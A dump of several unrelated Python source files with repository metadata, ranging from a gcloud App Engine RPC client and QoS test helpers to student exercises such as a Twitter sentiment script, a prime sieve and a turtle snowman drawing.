return. If None, today is used.
output_file: Output file name or '-' for standard output.
"""
rpcserver = self._GetRpcServer()
requestor = logs_requestor.LogsRequester(
rpcserver, self.project, service, version, severity, vhost,
include_vhost, include_all)
requestor.DownloadLogs(num_days, end_date, output_file)
def GetLogsAppend(self, service, version, severity, vhost, include_vhost,
include_all, end_date, output_file):
"""Get application logs and append them to an existing file.
Args:
service: str, The service of the app to fetch logs from.
version: str, The version of the app to fetch logs for.
severity: int, App log severity to request (0-4); None for request logs
only.
vhost: str, The virtual host of log messages to get. None for all hosts.
include_vhost: bool, If true, the virtual host is included in log
messages.
include_all: bool, If true, we add to the log message everything we know
about the request.
end_date: datetime.date, Date object representing last day of logs to
return. If None, today is used.
output_file: Output file name or '-' for standard output.
"""
rpcserver = self._GetRpcServer()
requestor = logs_requestor.LogsRequester(
rpcserver, self.project, service, version, severity, vhost,
include_vhost, include_all)
requestor.DownloadLogsAppend(end_date, output_file)
def PrepareVmRuntime(self):
"""Prepare the application for vm runtimes and return state."""
rpcserver = self._GetRpcServer(timeout_max_errors=5)
rpcserver.Send('/api/vms/prepare', app_id=self.project)
# TODO(b/29059251): vm_name and instance id are different, this API client
# needs the VM name. The Zeus API will use instance id instead.
def SetManagedByGoogle(self, service, version, vm_name=None, wait=True):
"""Sets a service version (and optionally an instance) to Google managed.
This will reboot the machine and restore the instance with a fresh runtime.
Args:
service: str, The service to update.
version: str, The version of the service to update.
vm_name: str, The vm name of the instance to update.
wait: bool, True to wait until it takes effect.
"""
self._SetManagedBy(service, version, vm_name, '/api/vms/lock', wait)
def SetManagedBySelf(self, service, version, vm_name=None, wait=True):
"""Sets a service version (optionally a single instance) as self managed.
This is the 'break the glass' mode that lets you ssh into the machine and
debug.
Args:
service: str, The service to update.
version: str, The version of the service to update.
vm_name: str, The vm name of the instance to update.
wait: bool, True to wait until it takes effect.
"""
self._SetManagedBy(service, version, vm_name, '/api/vms/debug', wait)
def _SetManagedBy(self, service, version, vm_name, url, wait):
"""Switches a service version between management modes.
Args:
service: str, The service to update.
version: str, The version of the service to update.
vm_name: str, The vm name of the instance to update.
url: str, The URL of the API to call to make the update.
wait: bool, True to wait until it takes effect.
Raises:
Error: if changing the instance debug state failed.
"""
rpcserver = self._GetRpcServer()
kwargs = {'app_id': self.project,
'version_match': version,
'module': service}
if vm_name:
kwargs['instance'] = vm_name
rpcserver.Send(url, **kwargs)
if wait:
def GetState():
yaml_data = rpcserver.Send(
'/api/vms/debugstate', app_id=self.project, version_match=version,
module=service)
state = yaml.safe_load(yaml_data)
done = state['state'] != 'PENDING'
return (done, (state['state'], state['message']))
def PrintRetryMessage((unused_state, msg), delay):
log.status.Print('{0}. Will try again in {1} seconds.'
.format(msg, delay))
_, (state, message) = util.RetryWithBackoff(
GetState, PrintRetryMessage, initial_delay=1, backoff_factor=2,
max_delay=5, max_tries=20)
if state == 'ERROR':
raise Error(message)
def StartService(self, service, version):
"""Starts serving a the given version of the service.
This only works if scaling is set to manual.
Args:
service: str, The service to start.
version: str, The version of the service to start.
"""
self._GetRpcServer().Send('/api/modules/start', app_id=self.project,
module=service, version=version)
def StopService(self, service, version):
"""Stop serving a the given version of the service.
This only works if scaling is set to manual.
Args:
service: str, The service to stop.
version: str, The version of the service to stop.
"""
self._GetRpcServer().Send('/api/modules/stop', app_id=self.project,
module=service, version=version)
def UpdateConfig(self, config_name, parsed_yaml):
"""Updates any of the supported config file types.
Args:
config_name: str, The name of the config to deploy.
parsed_yaml: The parsed object corresponding to that config type.
Raises:
UnknownConfigType: If config_name is not a value config type.
Returns:
Whatever the underlying update methods return.
"""
if config_name == yaml_parsing.ConfigYamlInfo.CRON:
return self.UpdateCron(parsed_yaml)
if config_name == yaml_parsing.ConfigYamlInfo.DISPATCH:
return self.UpdateDispatch(parsed_yaml)
if config_name == yaml_parsing.ConfigYamlInfo.DOS:
return self.UpdateDos(parsed_yaml)
if config_name == yaml_parsing.ConfigYamlInfo.INDEX:
return self.UpdateIndexes(parsed_yaml)
if config_name == yaml_parsing.ConfigYamlInfo.QUEUE:
return self.UpdateQueues(parsed_yaml)
raise UnknownConfigType(
'Config type [{0}] is not a known config type'.format(config_name))
def UpdateCron(self, cron_yaml):
"""Updates any new or changed cron definitions.
Args:
cron_yaml: The parsed yaml file with cron data.
"""
self._GetRpcServer().Send('/api/cron/update',
app_id=self.project, payload=cron_yaml.ToYAML())
def UpdateDispatch(self, dispatch_yaml):
"""Updates new or changed dispatch definitions.
Args:
dispatch_yaml: The parsed yaml file with dispatch data.
"""
self._GetRpcServer().Send('/api/dispatch/update',
app_id=self.project,
payload=dispatch_yaml.ToYAML())
def UpdateDos(self, dos_yaml):
"""Updates any new or changed dos definitions.
Args:
dos_yaml: The parsed yaml file with dos data.
"""
self._GetRpcServer().Send('/api/dos/update',
app_id=self.project, payload=dos_yaml.ToYAML())
def UpdateIndexes(self, index_yaml):
"""Updates indexes.
Args:
index_yaml: The parsed yaml file with index data.
"""
self._GetRpcServer().Send('/api/datastore/index/add',
app_id=self.project, payload=index_yaml.ToYAML())
def UpdateQueues(self, queue_yaml):
"""Updates any new or changed task queue definitions.
Args:
queue_yaml: The parsed yaml file with queue data.
"""
self._GetRpcServer().Send('/api/queue/update',
app_id=self.project, payload=queue_yaml.ToYAML())
def _GetRpcServer(self, timeout_max_errors=2):
"""Returns an instance of an AbstractRpcServer.
Args:
timeout_max_errors: How many timeout errors to retry.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
log.debug('Host: {0}'.format(self.server))
if self._IsGceEnvironment():
credentials = oauth2client_gce.AppAssertionCredentials()
else:
credentials = None
# In this case, the get_user_credentials parameters to the RPC server
# constructor is actually an OAuth2Parameters.
get_user_credentials = (
appengine_rpc_httplib2.HttpRpcServerOAuth2.OAuth2Parameters(
access_token=self.oauth2_access_token,
client_id=self.client_id,
client_secret=self.client_secret,
scope=APPCFG_SCOPES,
refresh_token=self.oauth2_refresh_token,
credential_file=None,
token_uri=None,
credentials=credentials))
# Also set gflags flag... this is a bit of a hack.
if hasattr(appengine_rpc_httplib2.tools, 'FLAGS'):
appengine_rpc_httplib2.tools.FLAGS.auth_local_webserver = True
server = RpcServerClass(
self.server,
get_user_credentials,
util.GetUserAgent(),
util.GetSourceName(),
host_override=None,
save_cookies=True,
auth_tries=3,
timeout_max_errors=timeout_max_errors,
account_type='HOSTED_OR_GOOGLE',
secure=True,
ignore_certs=self.ignore_bad_certs,
http_object=http.Http())
# TODO(user) Hack to avoid failure due to missing cacerts.txt resource.
server.certpath = None
# Don't use a cert file if the user passed ignore-bad-certs.
server.cert_file_available = not self.ignore_bad_certs
return util.RPCServer(server)
def _IsGceEnvironment(self):
"""Determine if we are running in a GCE environment.
Returns:
True if we are running in a GCE environment.
Raises:
Error: The user has requested authentication for a service account but the
environment is not correct for that to work.
"""
if self.authenticate_service_account:
# Avoid hard-to-understand errors later by checking that we have a
# metadata service (so we are in a GCE VM) and that the VM is configured
# with access to the appengine.admin scope.
url = '%s/%s/scopes' % (METADATA_BASE, SERVICE_ACCOUNT_BASE)
try:
req = urllib2.Request(url, headers={'Metadata-Flavor': 'Google'})
vm_scopes_string = urllib2.urlopen(req).read()
except urllib2.URLError, e:
raise Error(
'Could not obtain scope list from metadata service: %s: %s. This '
'may be because we are not running in a Google Compute Engine VM.' %
(url, e))
vm_scopes = vm_scopes_string.split()
missing = list(set(self.oauth_scopes).difference(vm_scopes))
if missing:
raise Error(
'You are currently logged into gcloud using a service account '
'which does not have the appropriate access to [{0}]. The account '
'has the following scopes: [{1}]. It needs [{2}] in order to '
'succeed.\nPlease recreate this VM instance with the missing '
'scopes. You may also log into a standard account that has the '
'appropriate access by using `gcloud auth login`.'
.format(self.project, ', '.join(vm_scopes), ', '.join(missing)))
return True
else:
return False
| [
"eyalev@gmail.com"
] | eyalev@gmail.com |
88b055f358acb24661e5028b06b5b3a1db141abd | 855b3ca4261062df8bd465155bbf71debb4cfc4a | /api_requests_loop.py | 248af027122b8724a7b42fce8038a4f655edf436 | [] | no_license | seanbradley/JobTests | 7310f1fbddd4861b446fb89b28aa8c27812efa91 | 6acf2c5ea3bf94209210d5e7ac5061d22a8d4b60 | refs/heads/master | 2021-01-10T18:41:59.486807 | 2015-01-17T22:01:18 | 2015-01-17T22:01:18 | 29,246,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | '''
QUESTION:
Write a function that fetches JSON data returned from an API (in this
example, geographic data from the Small Business Association).
'''
import requests
results = []
states = [
"AL", "AK", "AZ", "AR", "CA", "CO", "CT", "DC", "DE", "FL", "GA",
"HI", "ID", "IL", "IN", "IA", "KS", "KY", "LA", "ME", "MD",
"MA", "MI", "MN", "MS", "MO", "MT", "NE", "NV", "NH", "NJ",
"NM", "NY", "NC", "ND", "OH", "OK", "OR", "PA", "RI", "SC",
"SD", "TN", "TX", "UT", "VT", "VA", "WA", "WV", "WI", "WY"
]
def get_json():
for state in range(len(states)):
url = "http://api.sba.gov/geodata/city_county_links_for_state_of/" + states[state] + ".json"
r = requests.get(url)
results.append(r.json())
return results
get_json()
| [
"sean@blogblimp.com"
] | sean@blogblimp.com |
4595a232fd1799aea5d00a85018eb1cd75e6c634 | 1d2ee3e36c7cfcfac0279b863a34babfbada1b4c | /spoj-200/pos-neg.py | 14f5fd44bd5c1dc68d2edea78dd4e0dcc4bb59ba | [] | no_license | nagarajukusa24/Competitive-Coding | fb186ab1b9c944cd1461e9e3fc6bc65e481661df | 080ce69cc9ab087f1f5a124f377ffa173a73601c | refs/heads/master | 2023-03-18T06:31:13.879618 | 2021-03-10T05:11:53 | 2021-03-10T05:11:53 | 272,482,971 | 2 | 0 | null | 2020-10-23T16:42:14 | 2020-06-15T16:00:01 | C++ | UTF-8 | Python | false | false | 186 | py | t = int(input())
while(t):
n = int(input())
if(n>0):
print("{} is positive number".format(n))
elif(n<0):
print("{} is negative number".format(n))
else:
print("n is zero")
t-=1 | [
"nagarajukusa24@gmail.com"
] | nagarajukusa24@gmail.com |
5643825ae66b0749d5819dd56c95da79acd2cb2d | 05c90ad10bd805f168fc960334fa59ac8434af9d | /encryption/sieve.py | 0306ad16240b4c3791c3acd4d9e49491791af84f | [
"MIT"
] | permissive | didim99/FlaskLearning | f3df41d77bbf79554aba6aa0de2c77ed2b791097 | 66d9de3729d372ec548ffbaaaff1d50797467361 | refs/heads/master | 2023-05-13T07:18:54.904336 | 2020-04-03T09:31:12 | 2020-04-03T09:31:12 | 249,192,344 | 0 | 0 | MIT | 2023-05-01T21:22:05 | 2020-03-22T13:44:58 | Python | UTF-8 | Python | false | false | 1,738 | py | # Sieve of Eratosthenes
# Code by David Eppstein, UC Irvine, 28 Feb 2002
# http://code.activestate.com/recipes/117119/
class SieveEratosthenes(object):
# Maps composites to primes witnessing their compositeness.
# This is memory efficient, as the sieve is not "run forward"
# indefinitely, but only as long as required by the current
# number being tested.
#
D = {}
primes = []
def get(self, index: int):
return self.primes[index]
def get_size(self):
return len(self.primes)
def get_last(self):
if len(self.primes) == 0:
return 0
return self.primes[len(self.primes) - 1]
def fill(self, max_value):
gen = self.gen_primes()
while self.get_last() < max_value:
self.primes.append(next(gen))
def gen_primes(self):
""" Generate an infinite sequence of prime numbers.
"""
# The running integer that's checked for primeness
q = 2
while True:
if q not in self.D:
# q is a new prime.
# Yield it and mark its first multiple that isn't
# already marked in previous iterations
#
yield q
self.D[q * q] = [q]
else:
# q is composite. D[q] is the list of primes that
# divide it. Since we've reached q, we no longer
# need it in the map, but we'll mark the next
# multiples of its witnesses to prepare for larger
# numbers
#
for p in self.D[q]:
self.D.setdefault(p + q, []).append(p)
del self.D[q]
q += 1
| [
"didim@eclabs.ru"
] | didim@eclabs.ru |
5c4147e18f6cbf6bc084640d1ec95a20dce61064 | 39aee93aba4206153267e611f6bb81343e952c8d | /07-Social_Analytics/3/Unsolved/02-Stu_Recap_Tweet_Analysis/BreakingNews_Unsolved.py | e1d79a11b93ef28b1e3aa988168f06b42a0179cb | [] | no_license | sHongJung/Data_Analytics | 9b357886f6cf15c6b51ad079d7c1af97733346b4 | 5b544e7d090137371d99d7060ac9e36517854a2e | refs/heads/master | 2021-01-25T10:34:37.650233 | 2018-07-25T22:45:29 | 2018-07-25T22:45:29 | 123,358,805 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | # Dependencies
import tweepy
import json
import numpy as np
import twitter_api as ta
# Import and Initialize Sentiment Analyzer
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
analyzer = SentimentIntensityAnalyzer()
# Twitter API Keys
consumer_key = ta.consumer_key
consumer_secret = ta.consumer_secret
access_token = ta.access_token
access_token_secret = ta.access_token_secret
'''
numbers = [1,2,3,4,5,6]
mean = np.mean(numbers)
print(mean)
'''
# Setup Tweepy API Authentication
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())
# Target Search Term
handles = ['@larry', '@kevin', '@debbie']
# @TODO: UNCOMMENT THE FOLLOWING BLOCK AND COMPLETE THE CODE
# Add List to hold sentiment
# @TODO: YOUR CODE HERE
for x in range(5):
api.update_status("Hey! This is tweet #%s!" %x)
# Grab 25 tweets
# @TODO: YOUR CODE HERE
# Loop through all tweets
# @TODO: YOUR CODE HERE
# Run Vader Analysis on each tweet
# @TODO: YOUR CODE HERE
# Add each value to the appropriate array
# @TODO: YOUR CODE HERE
# Store the Average Sentiments
# @TODO: YOUR CODE HERE
# Print the Sentiments
# @TODO: YOUR CODE HERE
| [
"ken.sh.jung@gmail.com"
] | ken.sh.jung@gmail.com |
e4d0583561a6158725a236905afe2fbba09c6263 | d1ad901e1e926d9c92ce4dc7a7ba3c6ee91a65e2 | /spytest/apis/qos/qos.py | c4158600f29cdeb92e9d1a8b3ac6ac00fa192bab | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | SubhajitPalKeysight/sonic-mgmt | ff59c2c5baf53cc2575aea2d541278fc9cf56977 | e4b308a82572996b531cc09cbc6ba98b9bd283ea | refs/heads/master | 2022-12-31T01:03:47.757864 | 2020-10-15T11:04:37 | 2020-10-15T11:04:37 | 286,815,154 | 1 | 1 | NOASSERTION | 2020-08-11T18:08:34 | 2020-08-11T18:08:33 | null | UTF-8 | Python | false | false | 5,034 | py | import re
from spytest.utils import filter_and_select
from spytest import st
import json
def verify_qos_queue_counters(dut,port,queue_name,param_list,val_list,tol_list):
'''
verifies QOS queue counters in the CLI show qos queue counters
:param dut: Device name where the command to be executed
:type dut: string
:param port: interface name to be checked
:type dut: string
:param queue_name: queue name to be checked
:type dut: string
:param param_list: list of params to be verified; example ['pkts_count', 'pkts_drop']
:param val_list: list of expected values for the params specified; example ['10000','5000']
:param tol_list: tolerence value for each param while comparing; for example ['1000', '500']
:return: True/False True - success case; False - Failure case
usage: verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count', 'pkts_drop'],
['10000','5000'],['1000', '500'])
verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count'],['10000'],['1000'])
Created by: Julius <julius.mariyan@broadcom.com
'''
success = True
cli_out = st.show(dut,'show queue counters {}'.format(port))
fil_out = filter_and_select(cli_out, param_list, {"port" : port, "txq" : queue_name})
if not fil_out:
st.error('port: {} and queue name: {} not found in output: {}'.format(port,queue_name,cli_out))
return False
else:
fil_out = fil_out[0]
for param,val,tol in zip(param_list,val_list,tol_list):
try:
fil_out[param] = re.sub(",","",fil_out[param])
int(fil_out[param])
except ValueError:
st.error('cannot get integer value from obtained string: {}'.format(fil_out[param]))
return False
if int(fil_out[param])<=int(val)+int(tol) and int(fil_out[param])>=int(val)-int(tol):
st.log('obtained value: {} is in the range b/w {} and {} as expected for param: {}'
'in queue: {}'.format(int(fil_out[param]),int(val)-int(tol),
int(val)+int(tol),param,queue_name))
else:
st.error('obtained value: {} is NOT in the range b/w {} and {} for param: {}'
'in queue: {}'.format(int(fil_out[param]), int(val) - int(tol),
int(val) + int(tol), param, queue_name))
success = False
return True if success else False
def clear_qos_queue_counters(dut):
'''
:param dut: DUT name where CLI to be executed
:type dut: string
:return: True/False True - Success ; False - Failure
usage:
clear_qos_queue_counters(dut1)
Created by: Julius <julius.mariyan@broadcom.com
'''
return True if st.show(dut,'show queue counters --clear',skip_tmpl=True) else False
def bind_qos_map_port(dut, map_name, obj_name, interface):
'''
:param dut: device to be configured
:type dut: string
:param map_name: qos map name for example dscp_to_tc_map, tc_to_queue_map
:type map_name: string
:param obj_name: object name for example AZURE
:type obj_name: string
:param interface: interface to be associated for example Ethernet1
:type interface: string
:return: True/False True - Success ; False - Failure
usage:
bind_qos_map_port(dut1, "tc_to_queue_map", "Azure", "Ethernet0")
bind_qos_map_port(dut1, "dscp_to_tc_map", "Azure", "Ethernet2")
bind_qos_map_port(dut1, "tc_to_pg_map", "Azure", "Ethernet72")
Created by: Julius <julius.mariyan@broadcom.com
'''
final_data, temp_data = dict(), dict()
data = { map_name : "[" + map_name.upper() + "|" + obj_name + "]"}
temp_data[interface] = data
final_data['PORT_QOS_MAP'] = temp_data
data_json = json.dumps(final_data)
return st.apply_json(dut, data_json)
def clear_qos_config(dut):
'''
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
Clears all the QOS realted config from the device
:param dut:
:return:
'''
command = "config qos clear"
st.config(dut, command)
def create_qos_json(dut, block_name, sub_block, dict_input):
'''
:param dut: device to be configured
:type dut: string
:param block_name: name of the field in json, for eg: dscp_to_tc_map, tc_to_queue_map, wred_profile etc
:type block_name: string
:param sub_block: sub field name, for eg: AZURE, AZURE_LOSSLESS etc
:type sub_block: string
:param dict_input: input values in dictionary
:type dict_input: string
:return: True/False True - Success ; False - Failure
usage:
create_qos_json(dut1, "tc_to_queue_map", "Azure", {"wred_green_enable" : "true"})
Created by: Julius <julius.mariyan@broadcom.com
'''
final_data, temp_data = dict(), dict()
temp_data[sub_block] = dict_input
final_data[block_name.upper()] = temp_data
final_data = json.dumps(final_data)
return st.apply_json(dut, final_data)
| [
"noreply@github.com"
] | noreply@github.com |
6585fb31b416dfd35f83c956c594528d69b6d742 | 3fe5046326c0e6a63b9de6ab4de8f094f1e49614 | /bin/indent-ged | 165c4adbf540abe1e9a436dfd7f6e341711abfa8 | [] | no_license | dave-shawley/ged-work | cc7d6b71a58e3ac05d94177c018efe969fc60e0d | 1edc7d6c2b871d65668a7ec347a42d3727e615d1 | refs/heads/master | 2020-03-23T22:01:52.407922 | 2019-04-21T14:33:06 | 2019-04-21T14:33:06 | 142,148,536 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | #!/usr/bin/env python
#
import sys
with open(sys.argv[1], 'r+') as f:
lines = f.readlines()
f.seek(0)
for line in lines:
indent, rest = line.split(None, 1)
f.write('\t' * int(indent))
f.write(line)
| [
"daveshawley@gmail.com"
] | daveshawley@gmail.com | |
cefb634734daaaddf09a98024d5ec5e44fb354b5 | edb88981aa1420af7e074068ed7818b9d904a3dd | /tags/release-0.4.2/minds/test/test_cachefile.py | 550d17ef92064fd5da222650ab9c462809cf2eb8 | [] | no_license | BackupTheBerlios/mindretrieve-svn | 101c0f1dfc25d20d5f828b6fd0d43301b773af4e | 463745fcf1c1d5b1f6c201c30bcc339c99b437ed | refs/heads/master | 2021-01-22T13:57:31.225772 | 2006-04-28T04:24:43 | 2006-04-28T04:24:43 | 40,801,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | """
"""
import os, os.path, sys
import unittest
from config_help import cfg
from minds import cachefile
class TestCacheFile(unittest.TestCase):
FILE1 = 'testcache'
def setUp(self):
self.pathname = os.path.join(cfg.getPath('logs'), self.FILE1)
self.cleanup()
def tearDown(self):
self.cleanup()
def cleanup(self):
# hardcode path to avoid deleting real data in config goof
try: os.remove('testlogs/' + self.FILE1 + '.mlog')
except OSError: pass
try: os.remove('testlogs/' + self.FILE1 + '.qlog')
except OSError: pass
def test_write(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
c.write_qlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.qlog'))
self.assert_(os.path.getsize(self.pathname+'.qlog'),5)
c.write_mlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.mlog'))
self.assert_(os.path.getsize(self.pathname+'.mlog'),5)
def test_discard(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
c.discard()
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
if __name__ == '__main__':
unittest.main() | [
"tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990"
] | tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990 |
decce59127ee788d769e1ab985ac7c12d47f4947 | a0f795a1ef272eb7dbc2b3bab01b900414118fea | /tests/run_gen.py | 53cce7444df66935a441ce5aa7ff6b56979b85f6 | [
"Apache-2.0"
] | permissive | petanix/clvm_rs | a793e0df1a07d963fdf5014c8fe5d18ec3cd0971 | 51cac4558172d77dc11fcc2f2ccfed5b54edd11b | refs/heads/main | 2023-07-07T09:02:09.817738 | 2021-08-02T09:08:13 | 2021-08-02T09:08:13 | 391,870,474 | 0 | 0 | Apache-2.0 | 2021-08-02T08:30:28 | 2021-08-02T08:30:27 | null | UTF-8 | Python | false | false | 4,094 | py | #!/usr/bin/env python3
from clvm_rs import run_generator, STRICT_MODE
from clvm.operators import OP_REWRITE
from clvm import KEYWORD_FROM_ATOM, KEYWORD_TO_ATOM
from time import time
from clvm_tools import binutils
import sys
from run import native_opcode_names_by_opcode
def run_gen(fn):
# the generator ROM from:
# https://github.com/Chia-Network/chia-blockchain/blob/main/chia/wallet/puzzles/rom_bootstrap_generator.clvm.hex
program_data = bytes.fromhex(
"ff02ffff01ff02ff0cffff04ff02ffff04ffff02ff05ffff04ff08ffff04ff13"
"ff80808080ff80808080ffff04ffff01ffffff02ffff01ff05ffff02ff3effff"
"04ff02ffff04ff05ff8080808080ffff04ffff01ffffff81ff7fff81df81bfff"
"ffff02ffff03ffff09ff0bffff01818080ffff01ff04ff80ffff04ff05ff8080"
"80ffff01ff02ffff03ffff0aff0bff1880ffff01ff02ff1affff04ff02ffff04"
"ffff02ffff03ffff0aff0bff1c80ffff01ff02ffff03ffff0aff0bff1480ffff"
"01ff0880ffff01ff04ffff0effff18ffff011fff0b80ffff0cff05ff80ffff01"
"018080ffff04ffff0cff05ffff010180ff80808080ff0180ffff01ff04ffff18"
"ffff013fff0b80ffff04ff05ff80808080ff0180ff80808080ffff01ff04ff0b"
"ffff04ff05ff80808080ff018080ff0180ff04ffff0cff15ff80ff0980ffff04"
"ffff0cff15ff0980ff808080ffff04ffff04ff05ff1380ffff04ff2bff808080"
"ffff02ff16ffff04ff02ffff04ff09ffff04ffff02ff3effff04ff02ffff04ff"
"15ff80808080ff8080808080ff02ffff03ffff09ffff0cff05ff80ffff010180"
"ff1080ffff01ff02ff2effff04ff02ffff04ffff02ff3effff04ff02ffff04ff"
"ff0cff05ffff010180ff80808080ff80808080ffff01ff02ff12ffff04ff02ff"
"ff04ffff0cff05ffff010180ffff04ffff0cff05ff80ffff010180ff80808080"
"8080ff0180ff018080ff04ffff02ff16ffff04ff02ffff04ff09ff80808080ff"
"0d80ffff04ff09ffff04ffff02ff1effff04ff02ffff04ff15ff80808080ffff"
"04ff2dffff04ffff02ff15ff5d80ff7d80808080ffff02ffff03ff05ffff01ff"
"04ffff02ff0affff04ff02ffff04ff09ff80808080ffff02ff16ffff04ff02ff"
"ff04ff0dff8080808080ff8080ff0180ff02ffff03ffff07ff0580ffff01ff0b"
"ffff0102ffff02ff1effff04ff02ffff04ff09ff80808080ffff02ff1effff04"
"ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff0180"
"80")
# constants from the main chia blockchain:
# https://github.com/Chia-Network/chia-blockchain/blob/main/chia/consensus/default_constants.py
max_cost = 11000000000
cost_per_byte = 12000
env_data = binutils.assemble(open(fn, "r").read()).as_bin()
# we don't charge for the size of the generator ROM. However, we do charge
# cost for the operations it executes
max_cost -= len(env_data) * cost_per_byte
# add the block program arguments
block_program_args = b"\xff\x80\x80"
env_data = b"\xff" + env_data + b"\xff" + block_program_args + b"\x80"
return run_generator(
program_data,
env_data,
KEYWORD_TO_ATOM["q"][0],
KEYWORD_TO_ATOM["a"][0],
native_opcode_names_by_opcode,
max_cost,
0,
)
if __name__ == "__main__":
try:
start_time = time()
error_code, result, cost = run_gen(sys.argv[1])
run_time = time() - start_time
if error_code is not None:
print(f"Validation Error: {error_code}")
print(f"run-time: {run_time:.2f}s")
sys.exit(1)
start_time = time()
for r in sorted(result):
print(f"coin: {r.coin_name.hex()} ph: {r.puzzle_hash.hex()}")
for c in sorted(r.conditions):
print(f" {c[0]}")
for cwa in sorted(c[1], key=lambda x: (x.opcode, x.vars)):
print(f" {cwa.opcode}", end="")
for a in cwa.vars:
print(f" {a.hex()}", end="")
print("")
print_time = time() - start_time
print(f"cost: {cost}")
print(f"run-time: {run_time:.2f}s")
print(f"print-time: {print_time:.2f}s")
except Exception as e:
run_time = time() - start_time
print("FAIL:", e)
print(f"run-time: {run_time:.2f}s")
| [
"noreply@github.com"
] | noreply@github.com |
7220f69ad40171e2f3b038363316ca5856f0f28a | 6d95e2b9617080dbd1a5389fb02bad757e47f868 | /os_tkmonitor/os_tkmonitor_nouveau.py | 7ade64df569bec61bf3af5b2490d98ecca678c7a | [] | no_license | frank038/os_tkmonitor | 88ad22a0a062432f430d578d71c6313e36885222 | 5c0cfff59703c2023141f16ea130e5728298f4d9 | refs/heads/master | 2020-06-23T00:06:34.187928 | 2019-07-23T15:03:41 | 2019-07-23T15:03:41 | 198,439,850 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,926 | py | #!/usr/bin/env python3
"""
nvidia gpu module - driver nouveau
"""
import tkinter as tk
import tkinter.ttk as ttk
import os
import sys
import shutil
import subprocess
class FNV(ttk.Frame):
def __init__(self, master, root, frg_color):
super().__init__(master)
self.master = master
self.root = root
#
self.pack()
# blank line
ttk.Label(self, text=" ").grid(column=0, row=0)
# logo
self.nv_logo = tk.PhotoImage(file="NVLogo.png")
self.lab_logo = ttk.Label(self, text="logo", image=self.nv_logo)
self.lab_logo.grid(column=0, row=1, sticky="NW", rowspan=8)
## gpu name
tgpu_name = ""
gpu_name = ttk.Label(self, text="Product Name ", foreground=frg_color).grid(column=1, row=2, sticky="NE")
gpu_name2 = ttk.Label(self, text=tgpu_name).grid(column=2, row=2, sticky="NW")
## driver version
gpu_driver_version = ""
gpu_drv_ver = ttk.Label(self, text="Driver Version ", foreground=frg_color).grid(column=1, row=3, sticky="NE")
gpu_drv_ver2 = ttk.Label(self, text=gpu_driver_version).grid(column=2, row=3, sticky="NW")
## total memory
gpu_totmem = ""
gpu_tot_mem = ttk.Label(self, text="Total Memory ", foreground=frg_color).grid(column=1, row=4, sticky="NE")
gpu_tot_mem2 = ttk.Label(self, text=gpu_totmem).grid(column=2, row=4, sticky="NW")
## memory used
gpu_usedmem = ""
gpu_used_mem = ttk.Label(self, text="Memory Used ", foreground=frg_color).grid(column=1, row=5, sticky="NE")
gpu_used_mem2 = ttk.Label(self, text=gpu_usedmem).grid(column=2, row=5, sticky="NW")
## clock
self.gpu_clock = tk.StringVar()
self.gpu_clock.set("")
gpu_clock = ttk.Label(self, text="Clock ", foreground=frg_color).grid(column=1, row=6, sticky="NE")
gpu_clock2 = ttk.Label(self, textvariable=self.gpu_clock).grid(column=2, row=6, sticky="NW")
## temperature
self.gpu_temperature = tk.StringVar()
self.gpu_temperature.set("")
gpu_temp = ttk.Label(self, text="Temperature ", foreground=frg_color).grid(column=1, row=7, sticky="NE")
gpu_temp2 = ttk.Label(self, textvariable=self.gpu_temperature).grid(column=2, row=7, sticky="NW")
## gpu usage
self.gpu_usage = tk.StringVar()
self.gpu_usage.set("")
gpu_usage = ttk.Label(self, text="Usage ", foreground=frg_color).grid(column=1, row=8, sticky="NE")
gpu_usage2 = ttk.Label(self, textvariable=self.gpu_usage).grid(column=2, row=8, sticky="NW")
self.fupdate()
def fupdate(self):
# clock
self.gpu_clock.set("")
# temperature
self.gpu_temperature.set("")
# usage
self.gpu_usage.set("")
self.root.after(1000, self.fupdate)
| [
"noreply@github.com"
] | noreply@github.com |
5d650359e4a6cabc6ceb6bb2ab9f212feb1a9bfe | c9479bdcac0c3ebd1a2d107f4a2e303a36f3eb72 | /task1.py | d3cab55da3944d7f6b6ef91c5d03ed71eca62782 | [] | no_license | nathanwag15/snowmanandCuboid | 1891426d5a9ad5c5fba8b3497d5d0db2211b0101 | b81e849e421c55504fc3a447af0acaa90675a7f8 | refs/heads/master | 2022-11-09T06:49:37.867486 | 2020-06-09T20:33:52 | 2020-06-09T20:33:52 | 271,104,144 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,728 | py | #Nathan Wagstaff Assignment #4
# A snowman with two arms and a hat.
import turtle
#settings
turtle.speed(1)
turtle.width(10)
#base
turtle.penup()
turtle.goto(0, -300)
turtle.pendown()
turtle.circle(150)
#middle
turtle.penup()
turtle.goto(0, 0)
turtle.pendown()
turtle.circle(105)
#buttons
turtle.penup()
turtle.goto(0, 50)
turtle.pendown()
turtle.circle(1)
turtle.penup()
turtle.goto(0,100)
turtle.pendown()
turtle.circle(1)
turtle.penup()
turtle.goto(0,150)
turtle.pendown()
